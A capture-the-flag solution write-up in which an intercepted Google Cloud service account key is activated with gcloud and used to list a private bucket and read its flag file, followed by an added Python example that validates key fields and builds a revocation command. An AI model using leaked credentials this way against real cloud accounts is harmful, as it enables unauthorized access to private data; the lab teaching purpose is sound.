At Your Service - Solution

Introduction

There were once two hard-working and fun-loving men called Pranav and Bhagavan. As part of their everyday work, they would exchange challenges and artifacts in the cloud with each other using restricted service accounts.

We were able to intercept one of these exchanges but were only able to get hold of the service account JSON key. We did overhear them talking about a storage bucket called ctf-bucket-appsecco, which supposedly contains the goodies that they don't want the rest of the world to see.

Can you help us find and read the contents of this bucket, please?

Starting point

  1. Find the storage object and the secret file that Pranav and Bhagavan want to hide from us

Your task

  1. Read the contents of the ctf-bucket-appsecco bucket

Walkthrough

  1. Download the service account JSON key from the given URL under Starting point.

  2. Use gcloud to activate the service account that this key belongs to - gcloud auth activate-service-account --key-file=sa-token.json

  3. Verify the service account is activated - gcloud auth list

  4. Generate an auth token for this service account and assign it to a variable - export gcp_token=$(gcloud auth print-access-token)

  5. List the contents of the ctf-bucket-appsecco bucket using gsutil - gsutil ls gs://ctf-bucket-appsecco/

  6. Download and read the contents of flag.txt - gsutil cp gs://ctf-bucket-appsecco/flag.txt . ; cat flag.txt
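
The key file downloaded in step 1 names the identity that step 2 activates, and the same fields tell the key's owner which key to delete once it has leaked. The following is an added example, not part of the original walkthrough: it validates the standard fields of a service account key file and builds the gcloud command that deletes that key. The function name describe_sa_key and all sample values are assumptions constructed for illustration.

```python
import json
import shlex

# Fields of a Google Cloud service account key file that identify the key.
REQUIRED = ("type", "project_id", "private_key_id", "private_key", "client_email")

# Constructed sample, not a real key: every value below is a placeholder.
SAMPLE = json.dumps({
    "type": "service_account",
    "project_id": "example-project",
    "private_key_id": "0123456789abcdef0123456789abcdef01234567",
    "private_key": "constructed-placeholder-not-a-real-key",
    "client_email": "ctf-reader@example-project.iam.gserviceaccount.com",
})


def describe_sa_key(raw):
    """Validate a key file and return its identity; the private key is never returned."""
    key = json.loads(raw)
    if not isinstance(key, dict):
        raise ValueError("key file must be a JSON object")
    missing = [f for f in REQUIRED if not isinstance(key.get(f), str) or not key[f]]
    if missing:
        raise ValueError("missing or empty fields: " + ", ".join(missing))
    if key["type"] != "service_account":
        raise ValueError("not a service account key (type=%r)" % key["type"])
    if not key["client_email"].endswith(".gserviceaccount.com"):
        raise ValueError("client_email is not a service account address")
    # The file is untrusted input, so quote every value placed on a command line.
    revoke = shlex.join([
        "gcloud", "iam", "service-accounts", "keys", "delete",
        key["private_key_id"],
        "--iam-account=" + key["client_email"],
        "--project=" + key["project_id"],
    ])
    return {
        "account": key["client_email"],
        "project": key["project_id"],
        "key_id": key["private_key_id"],
        "revoke_cmd": revoke,
    }


if __name__ == "__main__":
    for name, value in describe_sa_key(SAMPLE).items():
        print(name + ": " + value)
```

The account value should match what gcloud auth list reports in step 3.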
